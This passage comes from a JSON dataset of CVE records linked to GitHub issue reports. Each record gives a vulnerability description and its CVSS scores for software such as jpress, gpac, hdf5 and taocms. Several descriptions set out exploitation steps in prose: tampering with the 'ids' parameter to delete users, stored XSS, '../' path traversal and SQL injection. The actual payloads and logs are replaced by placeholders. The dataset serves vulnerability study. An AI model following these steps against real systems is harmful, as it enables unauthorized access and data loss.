  76227. "description": "There is an Insecure Permissions vulnerability in APITAG NUMBERTAG FILETAG Low-level administrator root NUMBERTAG FILETAG Step NUMBERTAG: log in to the system with root NUMBERTAG and enter the user management page FILETAG Step NUMBERTAG: click the delete button to directly delete the administrator user admin FILETAG Delete succeeded\uff01 In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. (This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself.) The first step is to log in to the background with the root NUMBERTAG account and enter user management. FILETAG Step NUMBERTAG: after the packet capturing mode is enabled, click the delete button corresponding to user test FILETAG You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged-in user. FILETAG Delete succeeded\uff01",
  76228. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  76229. "severity": "MEDIUM",
  76230. "baseScore": 6.5,
  76231. "impactScore": 3.6,
  76232. "exploitabilityScore": 2.8
  76233. },
  76234. {
  76235. "CVE_ID": "CVE-2021-46086",
  76236. "Issue_Url_old": "https://github.com/mindskip/xzs-mysql/issues/327",
  76237. "Issue_Url_new": "https://github.com/mindskip/xzs-mysql/issues/327",
  76238. "Repo_new": "mindskip/xzs-mysql",
  76239. "Issue_Created_At": "2021-12-30T05:50:59Z",
  76240. "description": "There is an Insecure Permissions vulnerability in XZS. FILETAG The total exam time is NUMBERTAG minutes. You can see the remaining time displayed in the upper right. FILETAG Step NUMBERTAG: open the burpsuite proxy and click the submit button to obtain the packet capture data. FILETAG The value of dotime indicates the number of seconds between the beginning of this test and clicking submit, which can be modified to any number. FILETAG",
  76241. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  76242. "severity": "HIGH",
  76243. "baseScore": 7.5,
  76244. "impactScore": 3.6,
  76245. "exploitabilityScore": 3.9
  76246. },
  76247. {
  76248. "CVE_ID": "CVE-2021-46087",
  76249. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/19",
  76250. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/19",
  76251. "Repo_new": "jflyfox/jfinal_cms",
  76252. "Issue_Created_At": "2020-06-03T14:27:59Z",
  76253. "description": "A Stored XSS vulnerability exists in jfinal_cms NUMBERTAG There is a stored XSS vulnerability in the modification of a jfinal_CMS user's personal information. The attacker can insert malicious XSS code when modifying personal information, which then triggers an XSS attack when the administrator user views the user's personal information. First, register a user test, then enter the personal information page and insert the malicious XSS attack code in the remarks: payload: ERRORTAG FILETAG Then use the administrator account to view the user information: FILETAG Successfully triggered malicious XSS code: FILETAG Safety advice: strictly filter the user's input",
  76254. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  76255. "severity": "MEDIUM",
  76256. "baseScore": 5.4,
  76257. "impactScore": 2.7,
  76258. "exploitabilityScore": 2.3
  76259. },
  76260. {
  76261. "CVE_ID": "CVE-2021-46089",
  76262. "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3331",
  76263. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3331",
  76264. "Repo_new": "jeecgboot/jeecg-boot",
  76265. "Issue_Created_At": "2021-12-29T08:36:51Z",
  76266. "description": "There is an SQL injection vulnerability that can operate on the database with root privileges. version: APITAG poc: CODETAG",
  76267. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  76268. "severity": "CRITICAL",
  76269. "baseScore": 9.8,
  76270. "impactScore": 5.9,
  76271. "exploitabilityScore": 3.9
  76272. },
  76273. {
  76274. "CVE_ID": "CVE-2021-46104",
  76275. "Issue_Url_old": "https://github.com/webp-sh/webp_server_go/issues/92",
  76276. "Issue_Url_new": "https://github.com/webp-sh/webp_server_go/issues/92",
  76277. "Repo_new": "webp-sh/webp_server_go",
  76278. "Issue_Created_At": "2021-12-30T07:58:10Z",
  76279. "description": "Directory Traversal Vulnerability. I found a directory traversal vulnerability in the system; it can be used to traverse the files on the server. FILETAG Solution: restrict special symbols in the path, such as ../",
  76280. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  76281. "severity": "HIGH",
  76282. "baseScore": 7.5,
  76283. "impactScore": 3.6,
  76284. "exploitabilityScore": 3.9
  76285. },
  76286. {
  76287. "CVE_ID": "CVE-2021-46114",
  76288. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/172",
  76289. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/172",
  76290. "Repo_new": "jpressprojects/jpress",
  76291. "Issue_Created_At": "2022-01-09T08:54:40Z",
  76292. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u90ae\u4ef6\u6a21\u677fproduct. FILETAG",
  76293. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  76294. "severity": "HIGH",
  76295. "baseScore": 8.8,
  76296. "impactScore": 5.9,
  76297. "exploitabilityScore": 2.8
  76298. },
  76299. {
  76300. "CVE_ID": "CVE-2021-46115",
  76301. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/169",
  76302. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/169",
  76303. "Repo_new": "jpressprojects/jpress",
  76304. "Issue_Created_At": "2022-01-09T08:49:15Z",
  76305. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6a21\u677f\u4e0a\u4f20. \u5ba1\u8ba1\u8fc7\u7a0b APITAG APITAG APITAG ERRORTAG \u6548\u679c\u6f14\u793a \u5f31\u5bc6\u7801\u8fdb\u5165\u540e\u53f0\uff0c\u4fee\u6539\u4e0a\u4f20 FILETAG FILETAG \u8bbf\u95ee URLTAG \uff0c\u53ef\u4ee5\u770b\u5230\u8ba1\u7b97\u5668\u5f39\u51fa\uff0c\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f FILETAG",
  76306. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  76307. "severity": "HIGH",
  76308. "baseScore": 7.2,
  76309. "impactScore": 5.9,
  76310. "exploitabilityScore": 1.2
  76311. },
  76312. {
  76313. "CVE_ID": "CVE-2021-46116",
  76314. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/168",
  76315. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/168",
  76316. "Repo_new": "jpressprojects/jpress",
  76317. "Issue_Created_At": "2022-01-09T08:44:35Z",
  76318. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6a21\u677f\u5b89\u88c5. \u5ba1\u8ba1\u8fc7\u7a0b APITAG \u5728\u9875\u9762\u4e0a\u70b9\u51fb\u5b89\u88c5\u6a21\u677f FILETAG \u4e0a\u4f20\u6076\u610f\u6a21\u677f\u4e4b\u540e\uff0c\u7a0b\u5e8f\u8fd0\u884c\u5230 APITAG PATHTAG FILETAG \u6765\u770b\u5177\u4f53\u4ee3\u7801\uff0c APITAG APITAG FILETAG \u7136\u540e\u5c31\u53ef\u4ee5\u770b\u5230\uff0c\u6211\u4eec\u5199\u7684\u6076\u610f\u6a21\u677f\u5df2\u7ecf\u88ab\u89e3\u538b\u5230\u4e86\u8fd9\u4e2a\u76ee\u5f55\u4e0b FILETAG APITAG APITAG APITAG ERRORTAG \u63a5\u4e0b\u6765\u600e\u4e48\u8fdb\u884c\u5229\u7528\u5462\uff1f\u770b\u5230\u540e\u53f0\u8fd9\u4e2a\u5730\u65b9\u5b58\u5728\u4e00\u4e2a\u6a21\u677f\u9884\u89c8\u529f\u80fd FILETAG APITAG APITAG \u8fd9\u4e2a\u6a21\u677f FILETAG APITAG FILETAG \u6548\u679c\u6f14\u793a \u5f31\u5bc6\u7801\u8fdb\u5165\u540e\u53f0\uff0c\u5b89\u88c5\u6076\u610f\u6a21\u677f FILETAG FILETAG \u5f00\u542f\u6a21\u677f\u9884\u89c8\u529f\u80fd FILETAG \u8bbf\u95ee URLTAG \uff0c\u53d1\u73b0\u8ba1\u7b97\u5668\u5f39\u51fa\uff0c\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f FILETAG",
  76319. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  76320. "severity": "HIGH",
  76321. "baseScore": 7.2,
  76322. "impactScore": 5.9,
  76323. "exploitabilityScore": 1.2
  76324. },
  76325. {
  76326. "CVE_ID": "CVE-2021-46117",
  76327. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/171",
  76328. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/171",
  76329. "Repo_new": "jpressprojects/jpress",
  76330. "Issue_Created_At": "2022-01-09T08:53:50Z",
  76331. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u90ae\u4ef6\u6a21\u677fpage. FILETAG",
  76332. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  76333. "severity": "HIGH",
  76334. "baseScore": 7.2,
  76335. "impactScore": 5.9,
  76336. "exploitabilityScore": 1.2
  76337. },
  76338. {
  76339. "CVE_ID": "CVE-2021-46118",
  76340. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/170",
  76341. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/170",
  76342. "Repo_new": "jpressprojects/jpress",
  76343. "Issue_Created_At": "2022-01-09T08:52:56Z",
  76344. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u90ae\u4ef6\u6a21\u677f. FILETAG",
  76345. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  76346. "severity": "HIGH",
  76347. "baseScore": 7.2,
  76348. "impactScore": 5.9,
  76349. "exploitabilityScore": 1.2
  76350. },
  76351. {
  76352. "CVE_ID": "CVE-2021-46141",
  76353. "Issue_Url_old": "https://github.com/uriparser/uriparser/issues/121",
  76354. "Issue_Url_new": "https://github.com/uriparser/uriparser/issues/121",
  76355. "Repo_new": "uriparser/uriparser",
  76356. "Issue_Created_At": "2021-09-29T06:35:00Z",
  76357. "description": "input format check and memory manager issue. A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand. The bug was found with a fuzzer based on the test APITAG For the input provided by the user, it is the address on the Stack Memory, and is free to see if it is the address on the HEAP Memory. Also, as free also uses Memory Manager as shown below, malloc should also use Memory Manager _memory >free(memory, (URI_CHAR )uri APITAG It also requires a Format check for the inputs that the user accidentally or incorrectly entered. _ crash log NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d9be0 (pc NUMBERTAG ca NUMBERTAG bp NUMBERTAG sp NUMBERTAG fff NUMBERTAG d NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG ca NUMBERTAG in APITAG , unsigned long, unsigned long, APITAG , APITAG NUMBERTAG d NUMBERTAG in free NUMBERTAG c NUMBERTAG in (anonymous APITAG , void NUMBERTAG fca1c NUMBERTAG a4b2 in APITAG Steps to reproduce NUMBERTAG git clone FILETAG NUMBERTAG cd uriparser & mkdir build & cd build NUMBERTAG Build cmake APITAG APITAG DBUILD_SHARED_LIBS:BOOL=ON .. make j NUMBERTAG Download the attached APITAG NUMBERTAG Build TEST CODE NUMBERTAG cpp) clang++ g fsanitize=address,fuzzer no link o NUMBERTAG cpp I PATHTAG Luriparser/build luriparser NUMBERTAG Run PATHTAG NUMBERTAG OS:ubuntu NUMBERTAG FILETAG",
  76358. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76359. "severity": "MEDIUM",
  76360. "baseScore": 5.5,
  76361. "impactScore": 3.6,
  76362. "exploitabilityScore": 1.8
  76363. },
  76364. {
  76365. "CVE_ID": "CVE-2021-46142",
  76366. "Issue_Url_old": "https://github.com/uriparser/uriparser/issues/122",
  76367. "Issue_Url_new": "https://github.com/uriparser/uriparser/issues/122",
  76368. "Repo_new": "uriparser/uriparser",
  76369. "Issue_Created_At": "2021-09-29T06:38:40Z",
  76370. "description": "input format check and memory manager issue2. A bug was found within the uriparser. Though it might not be an intended use of the relevant API, the bug can still produce critical issues within a program using uriparser. It would be best if the affected logic is checked beforehand. The bug was found with a fuzzer based on the test APITAG Test APITAG APITAG assigns a URI, but this is an address on Stack Memory To assign normally, you must assign a memory from the object in APITAG because it is memory free from the object in APITAG With different Memory Manager, you can become a problem. It also requires a Format check for the inputs that the user accidentally or incorrectly entered. _ crash log NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d9be0 (pc NUMBERTAG ca NUMBERTAG bp NUMBERTAG sp NUMBERTAG ffd NUMBERTAG e6e0 T0) APITAG signal is caused by a WRITE memory access NUMBERTAG ca NUMBERTAG in APITAG , unsigned long, unsigned long, APITAG , APITAG NUMBERTAG d NUMBERTAG in free NUMBERTAG c NUMBERTAG in (anonymous APITAG , void NUMBERTAG faf2e1ac4b2 in APITAG Steps to reproduce NUMBERTAG git clone FILETAG NUMBERTAG cd uriparser & mkdir build & cd build NUMBERTAG Build cmake APITAG APITAG DBUILD_SHARED_LIBS:BOOL=ON .. make j NUMBERTAG Download the attached APITAG NUMBERTAG Build TEST CODE NUMBERTAG cpp) clang++ g fsanitize=address,fuzzer no link o NUMBERTAG cpp I PATHTAG I uriparser/ Luriparser/build luriparser NUMBERTAG Run PATHTAG NUMBERTAG OS:ubuntu NUMBERTAG FILETAG",
  76371. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76372. "severity": "MEDIUM",
  76373. "baseScore": 5.5,
  76374. "impactScore": 3.6,
  76375. "exploitabilityScore": 1.8
  76376. },
  76377. {
  76378. "CVE_ID": "CVE-2021-46143",
  76379. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/532",
  76380. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/532",
  76381. "Repo_new": "libexpat/libexpat",
  76382. "Issue_Created_At": "2021-12-30T19:25:05Z",
  76383. "description": "Reserved NUMBERTAG security issue upcoming). TBA",
  76384. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76385. "severity": "HIGH",
  76386. "baseScore": 7.8,
  76387. "impactScore": 5.9,
  76388. "exploitabilityScore": 1.8
  76389. },
  76390. {
  76391. "CVE_ID": "CVE-2021-46168",
  76392. "Issue_Url_old": "https://github.com/nimble-code/Spin/issues/56",
  76393. "Issue_Url_new": "https://github.com/nimble-code/spin/issues/56",
  76394. "Repo_new": "nimble-code/spin",
  76395. "Issue_Created_At": "2022-01-02T14:04:47Z",
  76396. "description": "Out of bounds Write in APITAG Out of bounds Write in APITAG Description Out of bounds Write in APITAG at APITAG If there are NUMBERTAG APITAG \uff0cthe yyin will add NUMBERTAG APITAG then, the APITAG at main NUMBERTAG will crash. APITAG If there are more APITAG than APITAG , the APITAG will be negative. APITAG then, the variables before APITAG will add NUMBERTAG Should there be a limit? version NUMBERTAG a0a5 APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz poc APITAG command APITAG Result ERRORTAG gdb ERRORTAG poc APITAG command APITAG Result ERRORTAG gdb CODETAG",
  76397. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76398. "severity": "MEDIUM",
  76399. "baseScore": 5.5,
  76400. "impactScore": 3.6,
  76401. "exploitabilityScore": 1.8
  76402. },
  76403. {
  76404. "CVE_ID": "CVE-2021-46169",
  76405. "Issue_Url_old": "https://github.com/nimble-code/Modex/issues/10",
  76406. "Issue_Url_new": "https://github.com/nimble-code/modex/issues/10",
  76407. "Repo_new": "nimble-code/modex",
  76408. "Issue_Created_At": "2022-01-02T17:23:15Z",
  76409. "description": "Use After Free. Use After Free Description I am learning model checking. But I run a fuzzer for fun today. My fuzzer has found a Use After Free in modex. The chunk NUMBERTAG b NUMBERTAG b0 was APITAG the tcache key was covered and the chunk was freed again. version acfa NUMBERTAG APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz poc CODETAG command APITAG Result ERRORTAG gdb APITAG APITAG n ERRORTAG",
  76410. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76411. "severity": "MEDIUM",
  76412. "baseScore": 5.5,
  76413. "impactScore": 3.6,
  76414. "exploitabilityScore": 1.8
  76415. },
  76416. {
  76417. "CVE_ID": "CVE-2021-46170",
  76418. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4917",
  76419. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4917",
  76420. "Repo_new": "jerryscript-project/jerryscript",
  76421. "Issue_Created_At": "2022-01-03T03:39:39Z",
  76422. "description": "Use After Free at PATHTAG in APITAG APITAG revision a6ab5e9 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case CODETAG Execution steps APITAG asan log ERRORTAG",
  76423. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  76424. "severity": "HIGH",
  76425. "baseScore": 7.5,
  76426. "impactScore": 3.6,
  76427. "exploitabilityScore": 3.9
  76428. },
  76429. {
  76430. "CVE_ID": "CVE-2021-46171",
  76431. "Issue_Url_old": "https://github.com/nimble-code/Modex/issues/8",
  76432. "Issue_Url_new": "https://github.com/nimble-code/modex/issues/8",
  76433. "Repo_new": "nimble-code/modex",
  76434. "Issue_Created_At": "2022-01-02T11:41:42Z",
  76435. "description": "NULL Pointer Dereference in APITAG NULL Pointer Dereference in APITAG Description NULL Pointer Dereference in APITAG at APITAG If there is no APITAG in the first argument of APITAG , s will be NULL and the next APITAG will crash. CODETAG CODETAG CODETAG version acfa NUMBERTAG APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz poc CODETAG command APITAG Result APITAG gdb CODETAG fix Should we add some code here to handle it? If there is no APITAG \uff0cget the substring from the NUMBERTAG st '(' to the NUMBERTAG st ',' in APITAG CODETAG",
  76436. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76437. "severity": "MEDIUM",
  76438. "baseScore": 5.5,
  76439. "impactScore": 3.6,
  76440. "exploitabilityScore": 1.8
  76441. },
  76442. {
  76443. "CVE_ID": "CVE-2021-46203",
  76444. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/13",
  76445. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/13",
  76446. "Repo_new": "taogogo/taocms",
  76447. "Issue_Created_At": "2022-01-04T02:10:14Z",
  76448. "description": "arbitrary file read vulnerability. poc After login as admin,file manager and downloadfunction FILETAG after change path param can read arbitrary file FILETAG analysis FILETAG FILETAG FILETAG we can use ../ to traverse to the previous directory suggest you can check path ,for example check if it has APITAG then refuse this request",
  76449. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  76450. "severity": "MEDIUM",
  76451. "baseScore": 6.5,
  76452. "impactScore": 3.6,
  76453. "exploitabilityScore": 2.8
  76454. },
  76455. {
  76456. "CVE_ID": "CVE-2021-46204",
  76457. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/14",
  76458. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/14",
  76459. "Repo_new": "taogogo/taocms",
  76460. "Issue_Created_At": "2022-01-04T02:47:28Z",
  76461. "description": "There is SQL blind injection at APITAG Link\". analysis The location of the vulnerability is line NUMBERTAG in PATHTAG and the incoming sql statement in the APITAG method does not use intval to process id,and FILETAG extends Article FILETAG FILETAG poc edit link FILETAG FILETAG then edit id as APITAG FILETAG",
  76462. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  76463. "severity": "CRITICAL",
  76464. "baseScore": 9.8,
  76465. "impactScore": 5.9,
  76466. "exploitabilityScore": 3.9
  76467. },
  76468. {
  76469. "CVE_ID": "CVE-2021-46225",
  76470. "Issue_Url_old": "https://github.com/LoicMarechal/libMeshb/issues/21",
  76471. "Issue_Url_new": "https://github.com/loicmarechal/libmeshb/issues/21",
  76472. "Repo_new": "loicmarechal/libmeshb",
  76473. "Issue_Created_At": "2022-01-07T01:08:36Z",
  76474. "description": "Buffer overflow when processing malformed mesh files. Hi folks, An interesting crash was found while fuzz testing of the mesh2poly binary which can be triggered via a malformed mesh file. Although the below malformed file only crashes the program as is, it could potentially be crafted further and create a security issue where these kinds of files would be able compromise the process's memory through taking advantage of affordances given by memory corruption. It's recommend to harden the code to prevent these kinds of bugs as it could greatly mitigate such this issue and even future bugs. APITAG (create file from scratch, no magic bytes necessary) APITAG debug log CODETAG",
  76475. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76476. "severity": "MEDIUM",
  76477. "baseScore": 6.5,
  76478. "impactScore": 3.6,
  76479. "exploitabilityScore": 2.8
  76480. },
  76481. {
  76482. "CVE_ID": "CVE-2021-46234",
  76483. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2023",
  76484. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2023",
  76485. "Repo_new": "gpac/gpac",
  76486. "Issue_Created_At": "2022-01-03T12:52:03Z",
  76487. "description": "Null Pointer Dereference in gf_node_unregister () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt ERRORTAG",
  76488. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76489. "severity": "MEDIUM",
  76490. "baseScore": 5.5,
  76491. "impactScore": 3.6,
  76492. "exploitabilityScore": 1.8
  76493. },
  76494. {
  76495. "CVE_ID": "CVE-2021-46236",
  76496. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2024",
  76497. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2024",
  76498. "Repo_new": "gpac/gpac",
  76499. "Issue_Created_At": "2022-01-03T12:56:20Z",
  76500. "description": "Null Pointer Dereference in gf_sg_vrml_field_pointer_del () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt ERRORTAG",
  76501. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76502. "severity": "MEDIUM",
  76503. "baseScore": 5.5,
  76504. "impactScore": 3.6,
  76505. "exploitabilityScore": 1.8
  76506. },
  76507. {
  76508. "CVE_ID": "CVE-2021-46237",
  76509. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2033",
  76510. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2033",
  76511. "Repo_new": "gpac/gpac",
  76512. "Issue_Created_At": "2022-01-05T09:17:46Z",
  76513. "description": "Untrusted pointer dereference in gf_node_unregister () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG FILETAG Result Segmentation fault. bt ERRORTAG",
  76514. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76515. "severity": "MEDIUM",
  76516. "baseScore": 5.5,
  76517. "impactScore": 3.6,
  76518. "exploitabilityScore": 1.8
  76519. },
  76520. {
  76521. "CVE_ID": "CVE-2021-46238",
  76522. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2027",
  76523. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2027",
  76524. "Repo_new": "gpac/gpac",
  76525. "Issue_Created_At": "2022-01-03T13:30:56Z",
  76526. "description": "stack overflow in gf_node_get_name () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76527. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76528. "severity": "MEDIUM",
  76529. "baseScore": 5.5,
  76530. "impactScore": 3.6,
  76531. "exploitabilityScore": 1.8
  76532. },
  76533. {
  76534. "CVE_ID": "CVE-2021-46239",
  76535. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2026",
  76536. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2026",
  76537. "Repo_new": "gpac/gpac",
  76538. "Issue_Created_At": "2022-01-03T13:18:56Z",
  76539. "description": "Invalid free in APITAG . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76540. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76541. "severity": "MEDIUM",
  76542. "baseScore": 5.5,
  76543. "impactScore": 3.6,
  76544. "exploitabilityScore": 1.8
  76545. },
  76546. {
  76547. "CVE_ID": "CVE-2021-46240",
  76548. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2028",
  76549. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2028",
  76550. "Repo_new": "gpac/gpac",
  76551. "Issue_Created_At": "2022-01-03T13:46:36Z",
  76552. "description": "Null Pointer Dereference in gf_dump_vrml_sffield () at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76553. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76554. "severity": "MEDIUM",
  76555. "baseScore": 5.5,
  76556. "impactScore": 3.6,
  76557. "exploitabilityScore": 1.8
  76558. },
  76559. {
  76560. "CVE_ID": "CVE-2021-46242",
  76561. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1329",
  76562. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1329",
  76563. "Repo_new": "hdfgroup/hdf5",
  76564. "Issue_Created_At": "2021-12-25T14:17:45Z",
  76565. "description": "A heap use after free in in H5AC_unpin_entry. Version: APITAG System information APITAG command: APITAG FILETAG Result Segmentation fault ASAN ERRORTAG",
  76566. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76567. "severity": "HIGH",
  76568. "baseScore": 8.8,
  76569. "impactScore": 5.9,
  76570. "exploitabilityScore": 2.8
  76571. },
  76572. {
  76573. "CVE_ID": "CVE-2021-46243",
  76574. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1326",
  76575. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1326",
  76576. "Repo_new": "hdfgroup/hdf5",
  76577. "Issue_Created_At": "2021-12-25T12:26:04Z",
  76578. "description": "Untrusted Pointer Dereference in H5O__dtype_decode_helper () at PATHTAG Untrusted Pointer Dereference in H5O__dtype_decode_helper () at PATHTAG Version APITAG command: APITAG FILETAG Result Segmentation fault. bt ERRORTAG",
  76579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76580. "severity": "MEDIUM",
  76581. "baseScore": 6.5,
  76582. "impactScore": 3.6,
  76583. "exploitabilityScore": 2.8
  76584. },
  76585. {
  76586. "CVE_ID": "CVE-2021-46244",
  76587. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1327",
  76588. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1327",
  76589. "Repo_new": "hdfgroup/hdf5",
  76590. "Issue_Created_At": "2021-12-25T13:30:58Z",
  76591. "description": "Divide By Zero in H5T__complete_copy () at PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG Result ERRORTAG bt ERRORTAG",
  76592. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76593. "severity": "MEDIUM",
  76594. "baseScore": 6.5,
  76595. "impactScore": 3.6,
  76596. "exploitabilityScore": 2.8
  76597. },
  76598. {
  76599. "CVE_ID": "CVE-2021-46255",
  76600. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/21",
  76601. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/21",
  76602. "Repo_new": "weng-xianhu/eyoucms",
  76603. "Issue_Created_At": "2022-01-07T05:45:28Z",
  76604. "description": "There is an arbitrary file deletion vulnerability in your code. \\ Author: yukidddd \\ Submit date: PATHTAG \\ Target: FILETAG \\ Version NUMBERTAG UTF8 SP NUMBERTAG URLTAG \\ APITAG to insufficient filtering of the parameter filename, it can cause any file to be deleted \\ APITAG FILETAG NUMBERTAG Now,content of the root folder of the website is like this,and we created a new FILETAG as a test FILETAG NUMBERTAG Then we log in as a normal user and send the following payload FILETAG CODETAG NUMBERTAG And now,the FILETAG file has been deleted FILETAG",
  76605. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  76606. "severity": "HIGH",
  76607. "baseScore": 8.1,
  76608. "impactScore": 5.2,
  76609. "exploitabilityScore": 2.8
  76610. },
  76611. {
  76612. "CVE_ID": "CVE-2021-46311",
  76613. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2038",
  76614. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2038",
  76615. "Repo_new": "gpac/gpac",
  76616. "Issue_Created_At": "2022-01-09T06:44:25Z",
